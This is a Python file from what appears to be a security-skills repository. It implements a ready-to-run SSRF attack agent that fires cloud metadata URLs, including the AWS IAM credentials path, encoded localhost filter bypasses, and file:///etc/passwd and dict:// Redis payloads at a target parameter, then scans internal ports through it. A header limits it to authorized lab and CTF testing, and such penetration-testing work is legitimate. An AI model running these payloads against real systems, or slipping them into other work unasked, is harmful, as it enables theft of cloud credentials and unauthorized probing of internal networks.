Files
mukul975 c47eed6a64 Production hardening: security fixes, code quality, 724 skills complete
- Fix 25 shell=True subprocess calls with list-based commands
- Fix 49 verify=False in defensive skills (env-var override)
- Add timeout to 231 HTTP/subprocess/socket calls
- Fix 6 SQL injection patterns with whitelist validation
- Replace 8 __import__() with standard imports
- Remove 701 unused imports across 442 files
- Add authorized-testing disclaimers to all offensive skills
- Complete 11 incomplete skill directories
- Expand 10 stub SKILL.md files with full content
- Fix 2 YAML parse errors in frontmatter
- Fix 5 pre-existing syntax errors
- Convert 22 hardcoded paths/ports to environment variables
- Back up 21 redundant skill pairs to .bak
- Fix 2 global declaration errors
- 724/724 skills with full folder anatomy (SKILL.md + agent.py + api-reference.md + LICENSE)
- 0 compile errors across all 724 agent.py files
2026-03-19 13:26:49 +01:00

184 lines
7.3 KiB
Python

#!/usr/bin/env python3
# For authorized testing in lab/CTF environments only
"""SSRF vulnerability detection agent with cloud metadata and filter bypass testing."""
import argparse
import json
import logging
import sys
from typing import List
try:
import requests
except ImportError:
sys.exit("requests is required: pip install requests")
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
logger = logging.getLogger(__name__)
CLOUD_METADATA = {
"aws_imdsv1": "http://169.254.169.254/latest/meta-data/",
"aws_iam": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"gcp": "http://metadata.google.internal/computeMetadata/v1/",
"azure": "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
"digitalocean": "http://169.254.169.254/metadata/v1/",
}
LOCALHOST_BYPASSES = [
"http://127.0.0.1/", "http://0177.0.0.1/", "http://0x7f.0.0.1/",
"http://2130706433/", "http://127.1/", "http://0/",
"http://[::1]/", "http://0.0.0.0/", "http://127.0.0.1.nip.io/",
]
PROTOCOL_PAYLOADS = [
"file:///etc/passwd", "file:///c:/windows/win.ini",
"dict://127.0.0.1:6379/info",
]
def test_ssrf_endpoint(target_url: str, param_name: str, payload_url: str,
method: str = "POST", auth_header: str = "") -> dict:
"""Send an SSRF payload to a target endpoint and analyze the response."""
headers = {"Content-Type": "application/json"}
if auth_header:
headers["Authorization"] = auth_header
data = {param_name: payload_url}
try:
if method.upper() == "POST":
resp = requests.post(target_url, json=data, headers=headers,
timeout=10, verify=False)
else:
resp = requests.get(target_url, params=data, headers=headers,
timeout=10, verify=False)
return {
"payload": payload_url,
"status_code": resp.status_code,
"content_length": len(resp.content),
"response_preview": resp.text[:200],
"success_indicators": _check_success(resp.text, payload_url),
}
except requests.RequestException as exc:
return {"payload": payload_url, "error": str(exc)}
def _check_success(response_text: str, payload: str) -> List[str]:
"""Check response for indicators of successful SSRF."""
indicators = []
checks = {
"aws_metadata": ["ami-id", "instance-id", "security-credentials", "iam"],
"gcp_metadata": ["computeMetadata", "project-id", "service-accounts"],
"azure_metadata": ["vmId", "subscriptionId", "resourceGroupName"],
"local_file": ["root:", "/bin/bash", "[extensions]", "for 16-bit"],
"internal_service": ["redis_version", "elasticsearch", "Jenkins"],
}
for name, keywords in checks.items():
if any(kw.lower() in response_text.lower() for kw in keywords):
indicators.append(name)
return indicators
def test_cloud_metadata(target_url: str, param_name: str,
auth_header: str = "") -> List[dict]:
"""Test SSRF against all cloud metadata endpoints."""
results = []
for provider, meta_url in CLOUD_METADATA.items():
result = test_ssrf_endpoint(target_url, param_name, meta_url,
auth_header=auth_header)
result["cloud_provider"] = provider
results.append(result)
if result.get("success_indicators"):
logger.warning("SSRF to %s: indicators=%s", provider, result["success_indicators"])
return results
def test_localhost_bypasses(target_url: str, param_name: str,
auth_header: str = "") -> List[dict]:
"""Test localhost SSRF filter bypasses."""
results = []
for bypass in LOCALHOST_BYPASSES:
result = test_ssrf_endpoint(target_url, param_name, bypass,
auth_header=auth_header)
result["bypass_type"] = "localhost_encoding"
results.append(result)
return results
def test_protocol_schemes(target_url: str, param_name: str,
auth_header: str = "") -> List[dict]:
"""Test non-HTTP protocol schemes (file://, dict://, gopher://)."""
results = []
for payload in PROTOCOL_PAYLOADS:
result = test_ssrf_endpoint(target_url, param_name, payload,
auth_header=auth_header)
result["protocol"] = payload.split(":")[0]
results.append(result)
return results
def scan_internal_ports(target_url: str, param_name: str, internal_ip: str,
ports: List[int], auth_header: str = "") -> List[dict]:
"""Scan internal ports via SSRF to discover services."""
results = []
for port in ports:
payload = f"http://{internal_ip}:{port}/"
result = test_ssrf_endpoint(target_url, param_name, payload,
auth_header=auth_header)
result["internal_ip"] = internal_ip
result["port"] = port
is_open = (result.get("status_code") == 200 and
result.get("content_length", 0) > 0 and
not result.get("error"))
result["port_likely_open"] = is_open
results.append(result)
return results
def run_assessment(target_url: str, param_name: str, auth_header: str = "") -> dict:
"""Run complete SSRF assessment."""
cloud = test_cloud_metadata(target_url, param_name, auth_header)
bypasses = test_localhost_bypasses(target_url, param_name, auth_header)
protocols = test_protocol_schemes(target_url, param_name, auth_header)
ports = scan_internal_ports(target_url, param_name, "127.0.0.1",
[22, 80, 443, 3306, 5432, 6379, 8080, 9200], auth_header)
findings = []
cloud_hits = [c for c in cloud if c.get("success_indicators")]
if cloud_hits:
findings.append(f"CRITICAL: Cloud metadata accessible via {len(cloud_hits)} endpoints")
bypass_hits = [b for b in bypasses if b.get("status_code") == 200 and b.get("content_length", 0) > 50]
if bypass_hits:
findings.append(f"HIGH: {len(bypass_hits)} localhost filter bypass(es) successful")
protocol_hits = [p for p in protocols if p.get("success_indicators")]
if protocol_hits:
findings.append(f"HIGH: Non-HTTP protocols accepted ({', '.join(p['protocol'] for p in protocol_hits)})")
return {
"target": target_url,
"parameter": param_name,
"cloud_metadata_tests": cloud,
"localhost_bypasses": bypasses,
"protocol_tests": protocols,
"internal_port_scan": ports,
"findings": findings,
}
def main():
parser = argparse.ArgumentParser(description="SSRF Vulnerability Assessment Agent")
parser.add_argument("--url", required=True, help="Target URL with SSRF-prone endpoint")
parser.add_argument("--param", default="url", help="Parameter name accepting URLs")
parser.add_argument("--auth", default="", help="Authorization header value")
parser.add_argument("--output", default="ssrf_report.json")
args = parser.parse_args()
report = run_assessment(args.url, args.param, args.auth)
with open(args.output, "w") as f:
json.dump(report, f, indent=2)
logger.info("Report saved to %s", args.output)
print(json.dumps(report, indent=2))
if __name__ == "__main__":
main()